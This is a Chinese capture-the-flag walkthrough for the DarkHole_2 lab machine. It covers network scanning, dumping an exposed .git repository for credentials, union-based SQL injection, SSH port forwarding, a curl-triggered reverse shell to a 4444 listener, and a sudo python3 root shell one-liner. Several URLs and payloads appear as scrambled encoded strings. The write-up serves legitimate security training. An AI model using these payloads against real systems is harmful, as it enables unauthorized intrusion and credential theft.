DarkHole_2通关思路

1.启动靶机

2.开启 kali 的 nmap 进行扫描，确定靶机 ip

namp -sn 192.168.5.0/24

3.扫描靶机开放的端口和服务

nmap -sV 192.168.5.241 //-sV 为扫描端口运行服务的版本信息

4.根据扫描结果确定开放了 80 和 22 端口，然后访问一下 80 端口

5.扫描网站指纹，没有看到有价值的信息

whatweb 192.168.5.241

6.扫描目录

dirsearch 147K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4z5p5k6Q4b7f1k6Q4c8e0c8Q4b7V1u0Q4b7e0g2Q4c8e0N6Q4z5f1y4Q4z5p5u0Q4c8e0g2Q4z5o6S2Q4b7U0m8Q4c8e0k6Q4z5f1y4Q4z5o6W2Q4c8e0c8Q4b7U0S2Q4z5o6m8Q4c8e0c8Q4b7U0S2Q4b7f1q4Q4x3X3g2Y4K9i4b7`. 目录

7.对.git目录进行操作

下载git-dump脚本，将源代码拔下来，我直接下载并放在kali上进行解压

​tar -zxvf git-dumper-1.0.8.tar.gz ​

z表示使用gzip进行解压，适用于.tar.gz或.tgz类型的压缩文件

x表示从归档文件中提取文件，及解压

v表示显示详细过程

f指定要解压的文件名

执行脚本

pip install -r requirements.txt
sudo ./git_dumper.py f8fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4x3V1k6Q4x3X3g2Y4K9i4b7`. hackgit
cd hackgit

可以看到扒下来的源代码，每一个都可以点进去看一看

利用git log命令可以查看日志

加密的地方为进行的具体操作，可以通过git diff命令进行查看

可以看到第二个加密内容里出现了sql语句，是登录的具体信息，可以得到账号和密码，lush@admin.com/321

8.得到密码之后登录

注意到id=1,可能存在注入

先判断数字型合适字符型，输入1=1和1=2返回一样，说明不是数字型，确定闭合是单引号还是双引号，结果为单引号

因为应用程序大多数情况只会返回sql语句第一次查询的数据，所以让前面为false，回显我们需要的第二段查询的数据，使用

567K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4x3V1k6V1j5i4y4Z5j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8q4)9J5k6o6q4Q4x3U0M7`. union select 1,database(),version(),4,@@datadir,@@basedir --+

fa2K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4x3V1k6V1j5i4y4Z5j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8q4)9J5k6o6q4Q4x3U0f1J5y4#2)9J5y4e0t1H3N6h3&6A6L8$3&6Q4x3U0f1J5x3s2y4W2L8r3g2U0N6q4)9J5y4e0t1H3x3g2)9J5b7$3c8S2N6r3q4T1j5i4y4W2i4K6t1^5i4K6t1&6i4K6u0o6N6X3g2J5M7$3W2G2L8W2)9J5z5q4)9J5z5g2)9J5b7K6c8Q4x3V1y4Y4M7X3!0#2M7q4)9#2k6X3y4G2L8X3y4S2N6q4)9J5z5s2c8S2j5X3I4W2i4K6g2X3L8X3q4E0k6g2)9J5z5g2)9J5b7#2)9@1x3q4)9@1x3r3u0S2M7$3g2V1K9i4u0Q4x3U0f1J5x3r3k6J5L8$3#2Q4x3U0f1J5x3r3W2F1k6X3!0J5L8h3q4@1K9h3!0F1i4K6g2X3M7$3y4Z5k6h3#2S2i4K6u0W2N6r3q4T1L8r3g2K6i4K6t1#2x3U0m8%4K9r3g2J5k6g2)9J5y4e0t1H3N6r3q4T1L8r3g2Q4y4h3k6K6j5$3S2W2L8h3q4Q4x3@1c8V1j5i4c8S2j5X3q4K6k6g2)9J5z5q4)9J5z5g2)9J5y4e0t1H3i4K6u0V1i4K6u0V1i4K6u0n7

group_concat会查询所有能查到的数据并组合成一个字符串，也可以利用limit 2,1来一个一个查询

继续查列名

0f4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4x3V1k6V1j5i4y4Z5j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8q4)9J5k6o6q4Q4x3U0f1J5y4#2)9J5y4e0t1H3N6h3&6A6L8$3&6Q4x3U0f1J5x3s2y4W2L8r3g2U0N6q4)9J5y4e0t1H3x3g2)9J5b7$3c8S2N6r3q4T1j5i4y4W2i4K6t1^5i4K6t1&6i4K6u0o6N6X3g2J5M7$3W2G2L8W2)9J5z5q4)9J5z5g2)9J5b7K6c8Q4x3V1y4Y4M7X3!0#2M7q4)9#2k6X3y4G2L8X3y4S2N6q4)9J5z5r3y4G2L8s2g2E0L8W2)9#2k6X3&6S2L8h3g2Q4x3U0W2Q4x3V1y4Q4y4o6m8Q4y4o6m8T1j5i4y4W2k6r3W2J5i4K6t1#2x3U0m8X3M7X3!0E0i4K6t1#2x3U0m8A6L8X3k6G2M7X3#2S2N6r3W2G2L8W2)9#2k6Y4y4U0K9r3g2E0j5g2)9J5k6h3y4G2L8s2g2E0L8Y4y4Q4x3U0f1J5x3s2N6Z5k6i4u0W2i4K6t1#2x3U0m8@1j5h3u0D9k6g2)9#2k6X3&6S2L8h3g2Q4x3@1c8Q4x3U0f1J5y4%4y4K6K9q4)9J5y4e0t1%4i4K6u0V1i4K6u0V1i4K6u0n7

查询user列和pass列

1adK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5&6x3W2)9J5k6e0p5$3z5q4)9J5k6e0g2Q4x3X3f1J5y4o6q4Q4x3V1k6V1j5i4y4Z5j5X3!0S2M7X3c8Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8q4)9J5k6o6q4Q4x3U0f1J5y4#2)9J5y4e0t1H3N6h3&6A6L8$3&6Q4x3U0f1J5x3s2y4W2L8r3g2U0N6q4)9J5y4e0t1H3x3g2)9J5b7K6u0Q4x3V1x3K6i4K6u0o6y4q4)9J5b7$3N6J5L8%4g2H3i4K6g2X3j5$3!0F1j5$3q4@1i4K6t1^5N6i4y4W2M7W2)9J5b7#2)9J5y4e0t1%4i4K6N6o6i4K6t1#2x3U0N6Q4x3V1y4H3j5i4y4K6i4K6t1&6i4K6u0o6i4K6b7H3i4K6b7H3j5X3q4K6k6h3c8A6M7W2)9J5y4e0t1H3k6Y4u0G2L8g2)9J5y4e0t1H3M7%4y4Z5i4K6u0V1i4K6u0V1i4K6u0n7

9.拿到账密登录ssh

ssh jebad@192.168.5.241

10.进行信息收集

查看计划任务,发现有一个跟losy账户相关的计划任务

cat /etc/crontab

查看历史执行的命令，发现htttp://127.0.0.1:9999可以执行命令

cat .bash_history

查看端口开放情况，发现确实有9999端口运行着某个服务

这里虽然开着9999端口，但是并不能访问，需要用到ssh端口转发功能，关于ssh端口转发的详细知识点可以查看 064K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6*7K9s2g2S2L8X3I4S2L8W2)9J5k6i4A6Z5K9h3S2#2i4K6u0W2j5$3!0E0i4K6u0r3M7q4)9J5c8U0p5@1z5o6R3J5y4e0b7@1z5b7`.`.

‍

11.kail新开一个窗口，配置ssh端口转发，并借此反弹交互式shell

将靶机的9999端口转发到kali的9999端口，冒号前面的9999代表kali的端口

ssh -L 9999:127.0.0.1:9999 jehad@192.168.5.241

kaili开启监听4444端口，利用靶机访问之前通过查询历史命令得到的url，执行命令弹shell到kali

curl c4bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0V1&6z5e0W2Q4x3V1k6Q4x3@1k6U0L8h3c8Q4x3@1c8T1j5i4y4Z5i4K6u0n7i4K6u0V1j5#2)9J5b7W2)9J5y4e0t1%4j5X3q4K6K9q4)9J5b7W2)9J5k6r3W2Q4x3V1u0Q4x3U0f1K6k6g2)9J5y4e0t1$3i4K6u0n7i4K6t1#2x3X3k6V1k6i4k6Q4x3U0f1J5k6Y4c8U0M7q4)9J5y4e0u0X3x3e0V1J5i4K6u0W2x3e0j5^5i4K6u0W2y4g2)9J5k6e0t1K6y4g2)9J5y4e0u0X3y4o6b7@1y4q4)9J5b7U0m8Q4x3U0f1K6k6g2)9J5y4e0t1$3x3g2)9J5y4e0t1%4

kali成功接收到losy用户的shell

查询.bash_history得到losy用户的密码

新开一个窗口通过ssh登录losy，然后通过sudo -l查询可以通过sudo执行的命令，发现python3

12.通过python3反弹一个shell到kali，得到root权限的shell，查询/root/root.txt得到flag，结束

sudo /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！